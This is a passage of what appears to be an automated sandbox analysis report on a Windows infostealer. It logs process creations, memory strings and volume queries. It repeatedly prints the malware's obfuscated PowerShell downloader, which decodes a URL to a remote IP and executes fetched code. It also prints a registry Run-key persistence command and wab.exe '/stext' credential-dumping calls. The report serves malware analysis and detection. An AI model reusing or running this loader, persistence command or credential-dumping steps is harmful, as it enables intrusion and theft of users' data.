Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mrynjuqqdntdz" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\otdfknajrvlikyvb" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\znrylxtlfddvmfrffvw" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$disclosed = 1;$urbaniserendes='substrin';$urbaniserendes+='g';function forkber($faktotummets){$chevee=$faktotummets.length-$disclosed;for($forsmaaendes=4; $forsmaaendes -lt $chevee; $forsmaaendes+=(5)){$diplomaterne+=$faktotummets.$urbaniserendes.invoke($forsmaaendes, $disclosed);}$diplomaterne;}function landlers($heelless){. ($privatdetektiv) ($heelless);}$pentandrian=forkber 'prakmintoo huczlangicl,nllizilleopateen/ti h5 apo.wise0wair biko(.yriwm rcicardnbrevddiscoekspw ,lisveja quifngerotsome modv1d wn0suld. .eg0outh;foug candwgsliip.eons es6uro 4adju; apo ov.xco,c6 for4m sa;skri ,arar.ubrvbere:tr.e1lapa2a.sc1br,i. fag0sk,o)hnge ammoggl eepantcdehykforgobuti/a,dr2toem0dict1forb0kold0supe1hane0br.m1beod sponfsemiishear hypep,inftranom.crxau o/ per1tilt2 .it1intr.saar0ban ';$opstrms=forkber 'persupsovs mase oger ,aa-bagsafriggudvleaffunroyctjarn ';$beskftigelsesterapiers=forkber ' hulhstruteftettre,prids:axo,/deci/ ver8tros7bek . qua1 ewh2lemm1 alf.pyth1ca.e0cry,5supe.unce1saxo6pro 3 ant/.eewhfloey panlant askipskonomno,eu prostele. freounmocincoxinte ';$holometaboly=forkber 'fili> afe ';$privatdetektiv=forkber 'bek igenee besx ur ';$homeokinetic = forkber ' arbedaphccoenh nonoak i mat %stigas,etp jovparchdchokajewet ca a,seg%s.an\ cengunsaupreta as.npanca katmgoldiwav.nprelevitt9fyr..tar j uddu esedstav hykl&menk&trun mainegoddc dath reko ne, g.id$t.ic ';landlers (forkber 's.ec$ ,fbgggeplafreosekrbequaacardltarp: livdatmoilazaspraiiallonpre t varebuksg ,elrimpreungar k.set.trt cor= pai(snevc cham ,atdspec .da/mashcskuf .cu$pul,hconfomyc,mhypee priobevakdksli bu n buse eaktholyitrkkcgebr)l,bb ');landlers (forkber 'grac$ .isgviadl sunosovibunfrareaclbuff:.aabpbefalfripabindsf,rgtkajsi .acc,ildkrdklo p,rr .attproce pletstif7pali=d.ba$ki kbkph e osesgazek d gftakstmon,i ,oegst,uenectl claskommemarcsprettconveuntrrbjr.ap,ivpleveiconsenysarknyssover.skemsgargp ac lpagii klatb,ad(mado$avanhga go pollsauno rgm phye.rsktfodba erb uniodiarlsubby,idu)chia ');$beskftigelsesterapiers=$plastickortet7[0];landlers (forkber 'robu$navngtagel melosc ebbeb.afanel ube: lilp.igra,rilp ksia.rimlhur iwh.msmodvttaa.iprotcpala=.ronnbacoeamphwkonf-tra.opre,b.arrji.veeappecindvt sup r,sshal.yjol smegatcausematmmteak. stansa.ae .nettikr.vanswoffpeoverbregicglycl au,ifrugethernfredtstac ');landlers (forkber 'milj$bungp p.oabou,pvulgaknitlforsitromskonft fodivrn.cinco.usanhtou ekirtage,edrubieinf,r st s,ygi[over$ oesoimpep,hags.rimtopinrvenemsurssacce]unce=,olo$cantp staenonnnene,tfai.aeff n bendkir,r.gglisubfatr.unaf o ');$brudekjolernes=forkber ' cenp neuasacrpgleradeltlfirei.ulcs klstlunciso tclugd.unald nfoovariwcollncolulwhooo fa,aub bdhydrfpel iimprl su.ephyt(gluc$plurbstr e .orshjemkex mfles,tskadihe.tgarthe akulpan.smerce vals verts.foepuybra,lwalgehpmu,di proesporrnonasl kk,kric$wholfthy l dimeprectaerooglycp.orteafm.rradia l,vthut.ilingosk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$disclosed = 1;$urbaniserendes='substrin';$urbaniserendes+='g';function forkber($faktotummets){$chevee=$faktotummets.length-$disclosed;for($forsmaaendes=4; $forsmaaendes -lt $chevee; $forsmaaendes+=(5)){$diplomaterne+=$faktotummets.$urbaniserendes.invoke($forsmaaendes, $disclosed);}$diplomaterne;}function landlers($heelless){. ($privatdetektiv) ($heelless);}$pentandrian=forkber 'prakmintoo huczlangicl,nllizilleopateen/ti h5 apo.wise0wair biko(.yriwm rcicardnbrevddiscoekspw ,lisveja quifngerotsome modv1d wn0suld. .eg0outh;foug candwgsliip.eons es6uro 4adju; apo ov.xco,c6 for4m sa;skri ,arar.ubrvbere:tr.e1lapa2a.sc1br,i. fag0sk,o)hnge ammoggl eepantcdehykforgobuti/a,dr2toem0dict1forb0kold0supe1hane0br.m1beod sponfsemiishear hypep,inftranom.crxau o/ per1tilt2 .it1intr.saar0ban ';$opstrms=forkber 'persupsovs mase oger ,aa-bagsafriggudvleaffunroyctjarn ';$beskftigelsesterapiers=forkber ' hulhstruteftettre,prids:axo,/deci/ ver8tros7bek . qua1 ewh2lemm1 alf.pyth1ca.e0cry,5supe.unce1saxo6pro 3 ant/.eewhfloey panlant askipskonomno,eu prostele. freounmocincoxinte ';$holometaboly=forkber 'fili> afe ';$privatdetektiv=forkber 'bek igenee besx ur ';$homeokinetic = forkber ' arbedaphccoenh nonoak i mat %stigas,etp jovparchdchokajewet ca a,seg%s.an\ cengunsaupreta as.npanca katmgoldiwav.nprelevitt9fyr..tar j uddu esedstav hykl&menk&trun mainegoddc dath reko ne, g.id$t.ic ';landlers (forkber 's.ec$ ,fbgggeplafreosekrbequaacardltarp: livdatmoilazaspraiiallonpre t varebuksg ,elrimpreungar k.set.trt cor= pai(snevc cham ,atdspec .da/mashcskuf .cu$pul,hconfomyc,mhypee priobevakdksli bu n buse eaktholyitrkkcgebr)l,bb ');landlers (forkber 'grac$ .isgviadl sunosovibunfrareaclbuff:.aabpbefalfripabindsf,rgtkajsi .acc,ildkrdklo p,rr .attproce pletstif7pali=d.ba$ki kbkph e osesgazek d gftakstmon,i ,oegst,uenectl claskommemarcsprettconveuntrrbjr.ap,ivpleveiconsenysarknyssover.skemsgargp ac lpagii klatb,ad(mado$avanhga go pollsauno rgm phye.rsktfodba erb uniodiarlsubby,idu)chia ');$beskftigelsesterapiers=$plastickortet7[0];landlers (forkber 'robu$navngtagel melosc ebbeb.afanel ube: lilp.igra,rilp ksia.rimlhur iwh.msmodvttaa.iprotcpala=.ronnbacoeamphwkonf-tra.opre,b.arrji.veeappecindvt sup r,sshal.yjol smegatcausematmmteak. stansa.ae .nettikr.vanswoffpeoverbregicglycl au,ifrugethernfredtstac ');landlers (forkber 'milj$bungp p.oabou,pvulgaknitlforsitromskonft fodivrn.cinco.usanhtou ekirtage,edrubieinf,r st s,ygi[over$ oesoimpep,hags.rimtopinrvenemsurssacce]unce=,olo$cantp staenonnnene,tfai.aeff n bendkir,r.gglisubfatr.unaf o ');$brudekjolernes=forkber ' cenp neuasacrpgleradeltlfirei.ulcs klstlunciso tclugd.unald nfoovariwcollncolulwhooo fa,aub bdhydrfpel iimprl su.ephyt(gluc$plurbstr e .orshjemkex mfles,tskadihe.tgarthe akulpan.smerce vals verts.foepuybra,lwalgehpmu,di proesporrnonasl kk,kric$wholfthy l dimeprectaerooglycp.orteafm.rradia l,vthut.ilingosk
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "subtruncated" /t reg_expand_sz /d "%balancegang% -w 1 $erhvervsvalget=(get-itemproperty -path 'hkcu:\martyrmines\').pamphletical;%balancegang% ($erhvervsvalget)"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$disclosed = 1;$urbaniserendes='substrin';$urbaniserendes+='g';function forkber($faktotummets){$chevee=$faktotummets.length-$disclosed;for($forsmaaendes=4; $forsmaaendes -lt $chevee; $forsmaaendes+=(5)){$diplomaterne+=$faktotummets.$urbaniserendes.invoke($forsmaaendes, $disclosed);}$diplomaterne;}function landlers($heelless){. ($privatdetektiv) ($heelless);}$pentandrian=forkber 'prakmintoo huczlangicl,nllizilleopateen/ti h5 apo.wise0wair biko(.yriwm rcicardnbrevddiscoekspw ,lisveja quifngerotsome modv1d wn0suld. .eg0outh;foug candwgsliip.eons es6uro 4adju; apo ov.xco,c6 for4m sa;skri ,arar.ubrvbere:tr.e1lapa2a.sc1br,i. fag0sk,o)hnge ammoggl eepantcdehykforgobuti/a,dr2toem0dict1forb0kold0supe1hane0br.m1beod sponfsemiishear hypep,inftranom.crxau o/ per1tilt2 .it1intr.saar0ban ';$opstrms=forkber 'persupsovs mase oger ,aa-bagsafriggudvleaffunroyctjarn ';$beskftigelsesterapiers=forkber ' hulhstruteftettre,prids:axo,/deci/ ver8tros7bek . qua1 ewh2lemm1 alf.pyth1ca.e0cry,5supe.unce1saxo6pro 3 ant/.eewhfloey panlant askipskonomno,eu prostele. freounmocincoxinte ';$holometaboly=forkber 'fili> afe ';$privatdetektiv=forkber 'bek igenee besx ur ';$homeokinetic = forkber ' arbedaphccoenh nonoak i mat %stigas,etp jovparchdchokajewet ca a,seg%s.an\ cengunsaupreta as.npanca katmgoldiwav.nprelevitt9fyr..tar j uddu esedstav hykl&menk&trun mainegoddc dath reko ne, g.id$t.ic ';landlers (forkber 's.ec$ ,fbgggeplafreosekrbequaacardltarp: livdatmoilazaspraiiallonpre t varebuksg ,elrimpreungar k.set.trt cor= pai(snevc cham ,atdspec .da/mashcskuf .cu$pul,hconfomyc,mhypee priobevakdksli bu n buse eaktholyitrkkcgebr)l,bb ');landlers (forkber 'grac$ .isgviadl sunosovibunfrareaclbuff:.aabpbefalfripabindsf,rgtkajsi .acc,ildkrdklo p,rr .attproce pletstif7pali=d.ba$ki kbkph e osesgazek d gftakstmon,i ,oegst,uenectl claskommemarcsprettconveuntrrbjr.ap,ivpleveiconsenysarknyssover.skemsgargp ac lpagii klatb,ad(mado$avanhga go pollsauno rgm phye.rsktfodba erb uniodiarlsubby,idu)chia ');$beskftigelsesterapiers=$plastickortet7[0];landlers (forkber 'robu$navngtagel melosc ebbeb.afanel ube: lilp.igra,rilp ksia.rimlhur iwh.msmodvttaa.iprotcpala=.ronnbacoeamphwkonf-tra.opre,b.arrji.veeappecindvt sup r,sshal.yjol smegatcausematmmteak. stansa.ae .nettikr.vanswoffpeoverbregicglycl au,ifrugethernfredtstac ');landlers (forkber 'milj$bungp p.oabou,pvulgaknitlforsitromskonft fodivrn.cinco.usanhtou ekirtage,edrubieinf,r st s,ygi[over$ oesoimpep,hags.rimtopinrvenemsurssacce]unce=,olo$cantp staenonnnene,tfai.aeff n bendkir,r.gglisubfatr.unaf o ');$brudekjolernes=forkber ' cenp neuasacrpgleradeltlfirei.ulcs klstlunciso tclugd.unald nfoovariwcollncolulwhooo fa,aub bdhydrfpel iimprl su.ephyt(gluc$plurbstr e .orshjemkex mfles,tskadihe.tgarthe akulpan.smerce vals verts.foepuybra,lwalgehpmu,di proesporrnonasl kk,kric$wholfthy l dimeprectaerooglycp.orteafm.rradia l,vthut.ilingosk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$disclosed = 1;$urbaniserendes='substrin';$urbaniserendes+='g';function forkber($faktotummets){$chevee=$faktotummets.length-$disclosed;for($forsmaaendes=4; $forsmaaendes -lt $chevee; $forsmaaendes+=(5)){$diplomaterne+=$faktotummets.$urbaniserendes.invoke($forsmaaendes, $disclosed);}$diplomaterne;}function landlers($heelless){. ($privatdetektiv) ($heelless);}$pentandrian=forkber 'prakmintoo huczlangicl,nllizilleopateen/ti h5 apo.wise0wair biko(.yriwm rcicardnbrevddiscoekspw ,lisveja quifngerotsome modv1d wn0suld. .eg0outh;foug candwgsliip.eons es6uro 4adju; apo ov.xco,c6 for4m sa;skri ,arar.ubrvbere:tr.e1lapa2a.sc1br,i. fag0sk,o)hnge ammoggl eepantcdehykforgobuti/a,dr2toem0dict1forb0kold0supe1hane0br.m1beod sponfsemiishear hypep,inftranom.crxau o/ per1tilt2 .it1intr.saar0ban ';$opstrms=forkber 'persupsovs mase oger ,aa-bagsafriggudvleaffunroyctjarn ';$beskftigelsesterapiers=forkber ' hulhstruteftettre,prids:axo,/deci/ ver8tros7bek . qua1 ewh2lemm1 alf.pyth1ca.e0cry,5supe.unce1saxo6pro 3 ant/.eewhfloey panlant askipskonomno,eu prostele. freounmocincoxinte ';$holometaboly=forkber 'fili> afe ';$privatdetektiv=forkber 'bek igenee besx ur ';$homeokinetic = forkber ' arbedaphccoenh nonoak i mat %stigas,etp jovparchdchokajewet ca a,seg%s.an\ cengunsaupreta as.npanca katmgoldiwav.nprelevitt9fyr..tar j uddu esedstav hykl&menk&trun mainegoddc dath reko ne, g.id$t.ic ';landlers (forkber 's.ec$ ,fbgggeplafreosekrbequaacardltarp: livdatmoilazaspraiiallonpre t varebuksg ,elrimpreungar k.set.trt cor= pai(snevc cham ,atdspec .da/mashcskuf .cu$pul,hconfomyc,mhypee priobevakdksli bu n buse eaktholyitrkkcgebr)l,bb ');landlers (forkber 'grac$ .isgviadl sunosovibunfrareaclbuff:.aabpbefalfripabindsf,rgtkajsi .acc,ildkrdklo p,rr .attproce pletstif7pali=d.ba$ki kbkph e osesgazek d gftakstmon,i ,oegst,uenectl claskommemarcsprettconveuntrrbjr.ap,ivpleveiconsenysarknyssover.skemsgargp ac lpagii klatb,ad(mado$avanhga go pollsauno rgm phye.rsktfodba erb uniodiarlsubby,idu)chia ');$beskftigelsesterapiers=$plastickortet7[0];landlers (forkber 'robu$navngtagel melosc ebbeb.afanel ube: lilp.igra,rilp ksia.rimlhur iwh.msmodvttaa.iprotcpala=.ronnbacoeamphwkonf-tra.opre,b.arrji.veeappecindvt sup r,sshal.yjol smegatcausematmmteak. stansa.ae .nettikr.vanswoffpeoverbregicglycl au,ifrugethernfredtstac ');landlers (forkber 'milj$bungp p.oabou,pvulgaknitlforsitromskonft fodivrn.cinco.usanhtou ekirtage,edrubieinf,r st s,ygi[over$ oesoimpep,hags.rimtopinrvenemsurssacce]unce=,olo$cantp staenonnnene,tfai.aeff n bendkir,r.gglisubfatr.unaf o ');$brudekjolernes=forkber ' cenp neuasacrpgleradeltlfirei.ulcs klstlunciso tclugd.unald nfoovariwcollncolulwhooo fa,aub bdhydrfpel iimprl su.ephyt(gluc$plurbstr e .orshjemkex mfles,tskadihe.tgarthe akulpan.smerce vals verts.foepuybra,lwalgehpmu,di proesporrnonasl kk,kric$wholfthy l dimeprectaerooglycp.orteafm.rradia l,vthut.ilingosk Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "subtruncated" /t reg_expand_sz /d "%balancegang% -w 1 $erhvervsvalget=(get-itemproperty -path 'hkcu:\martyrmines\').pamphletical;%balancegang% ($erhvervsvalget)" Jump to behavior
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\Wi
Source: wab.exe, 00000009.00000002.2926027586.00000000070B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerf
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2926027586.00000000070B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 00000009.00000002.2926027586.00000000070B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerD
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerJava\ja
Source: wab.exe, 00000009.00000002.2926027586.00000000070B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerp
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0mmon Ft
Source: wab.exe, 00000009.00000002.2926027586.0000000007008000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [2024/04/23 07:56:17 Program Manager]
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernet/93
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*m
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*,
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*)
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerC:\Prog
Source: wab.exe, 00000009.00000002.2926027586.00000000070B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager1
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerlesA=C
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2926027586.0000000007099000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles\*3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23012933 cpuid 9_2_23012933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23012264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_23012264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 14_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0041739B GetVersionExW, 13_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: wab.exe PID: 7140, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
